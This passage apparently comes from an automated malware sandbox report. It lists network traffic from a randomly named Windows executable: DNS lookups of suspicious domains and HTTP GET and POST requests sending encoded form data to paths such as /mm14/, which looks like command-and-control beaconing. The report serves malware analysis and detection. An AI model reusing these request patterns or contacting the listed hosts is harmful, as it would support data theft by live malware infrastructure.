Aug 29, 2024 12:25:13.583699942 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:13.583712101 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:13.583722115 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:13.583735943 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:13.583817959 CEST	80	49744	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:13.583843946 CEST	49744	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:13.589592934 CEST	49744	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:14.419081926 CEST	49744	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:15.439513922 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:15.445672035 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:15.447750092 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:15.455517054 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:15.460449934 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.115962029 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.115983009 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.115992069 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.116003990 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.116050959 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.116060972 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.116072893 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.116110086 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:16.116147995 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:16.116470098 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:16.116516113 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:16.122661114 CEST	49745	80	192.168.2.6	62.149.128.40
Aug 29, 2024 12:25:16.128813982 CEST	80	49745	62.149.128.40	192.168.2.6
Aug 29, 2024 12:25:29.652928114 CEST	49746	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:29.657795906 CEST	80	49746	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:29.658056974 CEST	49746	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:29.670027018 CEST	49746	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:29.674851894 CEST	80	49746	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:30.544399023 CEST	80	49746	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:30.544424057 CEST	80	49746	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:30.544492006 CEST	49746	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:31.184489012 CEST	49746	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:32.204027891 CEST	49747	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:32.209129095 CEST	80	49747	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:32.209224939 CEST	49747	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:32.222975969 CEST	49747	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:32.227858067 CEST	80	49747	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:33.110171080 CEST	80	49747	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:33.110219955 CEST	80	49747	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:33.110270977 CEST	49747	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:33.731597900 CEST	49747	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:34.749917984 CEST	49748	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:34.755177975 CEST	80	49748	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:34.755287886 CEST	49748	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:34.772934914 CEST	49748	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:34.777976990 CEST	80	49748	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:34.778131962 CEST	80	49748	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:35.641884089 CEST	80	49748	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:35.642014027 CEST	80	49748	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:35.642394066 CEST	49748	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:36.278160095 CEST	49748	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:37.301538944 CEST	49750	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:37.306972980 CEST	80	49750	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:37.307061911 CEST	49750	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:37.317598104 CEST	49750	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:37.323138952 CEST	80	49750	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:38.203598976 CEST	80	49750	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:38.203727961 CEST	80	49750	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:38.203799963 CEST	49750	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:38.208492041 CEST	49750	80	192.168.2.6	18.162.124.14
Aug 29, 2024 12:25:38.215342999 CEST	80	49750	18.162.124.14	192.168.2.6
Aug 29, 2024 12:25:43.307550907 CEST	49751	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:43.312428951 CEST	80	49751	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:43.313252926 CEST	49751	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:43.324671984 CEST	49751	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:43.329510927 CEST	80	49751	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:43.969052076 CEST	80	49751	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:43.969090939 CEST	80	49751	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:43.969232082 CEST	49751	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:44.826400042 CEST	49751	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:45.863552094 CEST	49752	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:45.868527889 CEST	80	49752	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:45.868745089 CEST	49752	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:45.880811930 CEST	49752	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:45.886495113 CEST	80	49752	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:46.534280062 CEST	80	49752	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:46.534446001 CEST	80	49752	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:46.534497976 CEST	49752	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:49.279145956 CEST	49752	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:50.296776056 CEST	49753	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:50.301745892 CEST	80	49753	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:50.302700043 CEST	49753	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:50.313653946 CEST	49753	80	192.168.2.6	65.21.196.90
Aug 29, 2024 12:25:50.319127083 CEST	80	49753	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:50.319480896 CEST	80	49753	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:50.963126898 CEST	80	49753	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:50.963162899 CEST	80	49753	65.21.196.90	192.168.2.6
Aug 29, 2024 12:25:50.963341951 CEST	49753	80	192.168.2.6	65.21.196.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:23:24.929364920 CEST	55897	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:23:25.393227100 CEST	53	55897	1.1.1.1	192.168.2.6
Aug 29, 2024 12:23:41.031733990 CEST	61385	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:23:41.046410084 CEST	53	61385	1.1.1.1	192.168.2.6
Aug 29, 2024 12:23:54.328567028 CEST	62707	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:23:54.353156090 CEST	53	62707	1.1.1.1	192.168.2.6
Aug 29, 2024 12:24:39.047486067 CEST	58020	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:24:39.117079020 CEST	53	58020	1.1.1.1	192.168.2.6
Aug 29, 2024 12:24:53.313379049 CEST	50375	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:24:53.726114035 CEST	53	50375	1.1.1.1	192.168.2.6
Aug 29, 2024 12:25:06.909281015 CEST	57716	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:25:06.975286961 CEST	53	57716	1.1.1.1	192.168.2.6
Aug 29, 2024 12:25:21.141753912 CEST	59808	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:25:21.151571035 CEST	53	59808	1.1.1.1	192.168.2.6
Aug 29, 2024 12:25:29.221590996 CEST	49179	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:25:29.648750067 CEST	53	49179	1.1.1.1	192.168.2.6
Aug 29, 2024 12:25:43.219314098 CEST	55988	53	192.168.2.6	1.1.1.1
Aug 29, 2024 12:25:43.301373959 CEST	53	55988	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 12:23:24.929364920 CEST	192.168.2.6	1.1.1.1	0x282b	Standard query (0)	www.limonchimneysweep.shop	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:23:41.031733990 CEST	192.168.2.6	1.1.1.1	0xea52	Standard query (0)	www.jobworklanka.online	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:23:54.328567028 CEST	192.168.2.6	1.1.1.1	0x7102	Standard query (0)	www.helloanecdotenow.info	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:39.047486067 CEST	192.168.2.6	1.1.1.1	0x7a5	Standard query (0)	www.dom-2.online	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:53.313379049 CEST	192.168.2.6	1.1.1.1	0xf552	Standard query (0)	www.kiristyle.shop	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:06.909281015 CEST	192.168.2.6	1.1.1.1	0x6c30	Standard query (0)	www.fimgroup.net	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:21.141753912 CEST	192.168.2.6	1.1.1.1	0x83cc	Standard query (0)	www.loveinpoeipet07.site	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:29.221590996 CEST	192.168.2.6	1.1.1.1	0xde56	Standard query (0)	www.6rkdm.top	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:43.219314098 CEST	192.168.2.6	1.1.1.1	0x8b50	Standard query (0)	www.030002721.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 12:23:25.393227100 CEST	1.1.1.1	192.168.2.6	0x282b	No error (0)	www.limonchimneysweep.shop	limonchimneysweep.shop		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:23:25.393227100 CEST	1.1.1.1	192.168.2.6	0x282b	No error (0)	limonchimneysweep.shop		198.57.245.28	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:23:41.046410084 CEST	1.1.1.1	192.168.2.6	0xea52	No error (0)	www.jobworklanka.online	jobworklanka.online		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:23:41.046410084 CEST	1.1.1.1	192.168.2.6	0xea52	No error (0)	jobworklanka.online		91.184.0.200	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:23:54.353156090 CEST	1.1.1.1	192.168.2.6	0x7102	No error (0)	www.helloanecdotenow.info	helloanecdotenow.info		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:23:54.353156090 CEST	1.1.1.1	192.168.2.6	0x7102	No error (0)	helloanecdotenow.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:23:54.353156090 CEST	1.1.1.1	192.168.2.6	0x7102	No error (0)	helloanecdotenow.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:39.117079020 CEST	1.1.1.1	192.168.2.6	0x7a5	No error (0)	www.dom-2.online		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:24:53.726114035 CEST	1.1.1.1	192.168.2.6	0xf552	No error (0)	www.kiristyle.shop	shops.vipshopbuy.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:24:53.726114035 CEST	1.1.1.1	192.168.2.6	0xf552	No error (0)	shops.vipshopbuy.com		35.244.245.121	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:06.975286961 CEST	1.1.1.1	192.168.2.6	0x6c30	No error (0)	www.fimgroup.net	fimgroup.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:25:06.975286961 CEST	1.1.1.1	192.168.2.6	0x6c30	No error (0)	fimgroup.net		62.149.128.40	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:21.151571035 CEST	1.1.1.1	192.168.2.6	0x83cc	Name error (3)	www.loveinpoeipet07.site	none	none	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:29.648750067 CEST	1.1.1.1	192.168.2.6	0xde56	No error (0)	www.6rkdm.top	6rkdm.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:25:29.648750067 CEST	1.1.1.1	192.168.2.6	0xde56	No error (0)	6rkdm.top		18.162.124.14	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:25:43.301373959 CEST	1.1.1.1	192.168.2.6	0x8b50	No error (0)	www.030002721.xyz	030002721.xyz		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:25:43.301373959 CEST	1.1.1.1	192.168.2.6	0x8b50	No error (0)	030002721.xyz		65.21.196.90	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.limonchimneysweep.shop

www.jobworklanka.online

www.helloanecdotenow.info

www.dom-2.online

www.kiristyle.shop

www.fimgroup.net

www.6rkdm.top

www.030002721.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49719	198.57.245.28	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:25.419553995 CEST	599	OUT	GET /n2gl/?oLy=-hKdflfxw6&cLStcv3=flitv4ONTDzavgdus+zcTsH6nWgS1QLhloTdmohmQPl3KhGoeMiAoTCl41HMocxZ34RiCsybNbAZ6Ep4mPYRLqm0WDj9ayw3PA1jxKqGfzp18YAn+IY5szwPiI05gk5QbUl5B1g= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.limonchimneysweep.shop User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:23:25.983807087 CEST	1007	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 10:23:25 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Oct 2019 09:25:04 GMT Accept-Ranges: bytes Content-Length: 746 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49722	91.184.0.200	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:41.064968109 CEST	868	OUT	POST /mm14/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.jobworklanka.online Origin: http://www.jobworklanka.online Referer: http://www.jobworklanka.online/mm14/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 50 7a 76 4c 73 4a 7a 49 50 6f 4c 36 36 47 56 71 38 34 74 49 69 6d 49 30 38 68 4b 4f 68 4c 31 77 57 6a 2b 58 36 63 67 47 73 56 34 68 6f 37 36 43 43 78 54 4d 32 6d 66 34 47 65 56 37 78 7a 37 4c 42 2f 4f 76 36 68 69 75 71 6e 70 2b 30 4c 2b 72 50 74 50 41 4c 53 68 46 59 4f 32 33 32 33 63 41 31 37 5a 54 38 4c 49 41 32 68 76 4a 31 46 35 72 6e 49 63 58 69 65 38 77 4b 2f 6f 67 4f 63 33 4c 61 69 4d 6e 33 62 44 47 50 59 63 77 48 6f 54 64 46 39 44 2b 72 62 49 42 68 7a 59 50 47 38 58 4e 70 45 35 56 66 54 61 30 43 34 55 70 77 4d 53 50 78 72 44 66 6a 4c 46 44 77 4e 68 7a 46 65 66 79 67 56 51 35 78 47 4b 73 41 6b 44 50 Data Ascii: cLStcv3=PzvLsJzIPoL66GVq84tIimI08hKOhL1wWj+X6cgGsV4ho76CCxTM2mf4GeV7xz7LB/Ov6hiuqnp+0L+rPtPALShFYO2323cA17ZT8LIA2hvJ1F5rnIcXie8wK/ogOc3LaiMn3bDGPYcwHoTdF9D+rbIBhzYPG8XNpE5VfTa0C4UpwMSPxrDfjLFDwNhzFefygVQ5xGKsAkDP
Aug 29, 2024 12:23:41.675009966 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 10:23:41 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49723	91.184.0.200	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:43.609822989 CEST	892	OUT	POST /mm14/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.jobworklanka.online Origin: http://www.jobworklanka.online Referer: http://www.jobworklanka.online/mm14/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 50 7a 76 4c 73 4a 7a 49 50 6f 4c 36 31 48 6c 71 2f 66 42 49 31 32 49 37 2f 68 4b 4f 75 72 30 35 57 6a 36 58 36 5a 4d 57 74 68 55 68 70 5a 79 43 44 77 54 4d 78 6d 66 34 65 75 56 2b 2b 54 37 43 42 2f 44 50 36 67 65 75 71 6a 42 2b 30 50 36 72 4f 63 50 44 45 69 68 48 56 75 32 31 38 58 63 41 31 37 5a 54 38 4c 63 6d 32 68 33 4a 31 55 4a 72 6c 73 49 51 76 2b 38 2f 64 50 6f 67 66 4d 33 48 61 69 4e 43 33 65 69 62 50 61 55 77 48 6f 6a 64 46 4d 44 78 79 72 4a 4b 2b 6a 5a 66 44 4f 71 48 7a 6e 34 45 66 43 4f 53 63 49 77 2f 31 36 54 56 74 59 44 38 78 62 6c 42 77 50 35 42 46 2b 66 59 69 56 6f 35 6a 52 47 4c 50 51 6d 73 79 50 50 30 62 70 42 66 73 54 50 51 32 4a 4d 2f 6f 70 66 79 73 41 3d 3d Data Ascii: cLStcv3=PzvLsJzIPoL61Hlq/fBI12I7/hKOur05Wj6X6ZMWthUhpZyCDwTMxmf4euV++T7CB/DP6geuqjB+0P6rOcPDEihHVu218XcA17ZT8Lcm2h3J1UJrlsIQv+8/dPogfM3HaiNC3eibPaUwHojdFMDxyrJK+jZfDOqHzn4EfCOScIw/16TVtYD8xblBwP5BF+fYiVo5jRGLPQmsyPP0bpBfsTPQ2JM/opfysA==
Aug 29, 2024 12:23:44.256283045 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 10:23:44 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49724	91.184.0.200	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:46.164942980 CEST	1905	OUT	POST /mm14/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.jobworklanka.online Origin: http://www.jobworklanka.online Referer: http://www.jobworklanka.online/mm14/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 50 7a 76 4c 73 4a 7a 49 50 6f 4c 36 31 48 6c 71 2f 66 42 49 31 32 49 37 2f 68 4b 4f 75 72 30 35 57 6a 36 58 36 5a 4d 57 74 67 41 68 6f 72 4b 43 43 54 4c 4d 77 6d 66 34 54 4f 56 2f 2b 54 36 41 42 2f 62 44 36 67 53 55 71 6c 46 2b 6c 61 75 72 4a 6f 54 44 54 79 68 48 4a 65 32 34 32 33 64 59 31 37 4a 58 38 4c 4d 6d 32 68 33 4a 31 58 42 72 73 59 63 51 74 2b 38 77 4b 2f 6f 57 4f 63 33 6a 61 69 45 2f 33 65 6e 73 4d 71 30 77 4a 6f 7a 64 57 75 62 78 37 72 4a 49 39 6a 59 61 44 4f 6d 45 7a 6e 6b 49 66 43 36 73 63 4c 73 2f 33 65 53 72 33 4a 76 45 75 70 74 32 73 74 39 78 65 70 69 71 76 54 52 48 6a 41 47 48 47 54 79 59 2f 5a 53 74 5a 35 38 76 75 51 76 34 77 64 6b 78 75 4a 61 36 78 32 50 45 43 34 2f 64 31 53 63 37 39 42 58 33 66 66 51 43 6c 48 59 66 4e 32 72 66 67 52 79 65 38 6c 61 30 63 58 62 45 6d 47 4f 43 2b 62 58 5a 4f 35 71 38 4d 63 57 38 41 52 45 75 43 42 58 77 6a 39 2f 47 76 53 59 68 41 71 48 2b 6f 74 52 31 4c 5a 46 66 33 56 74 76 62 53 38 76 56 37 43 78 32 69 30 47 2b 61 66 72 4f 33 [TRUNCATED] Data Ascii: 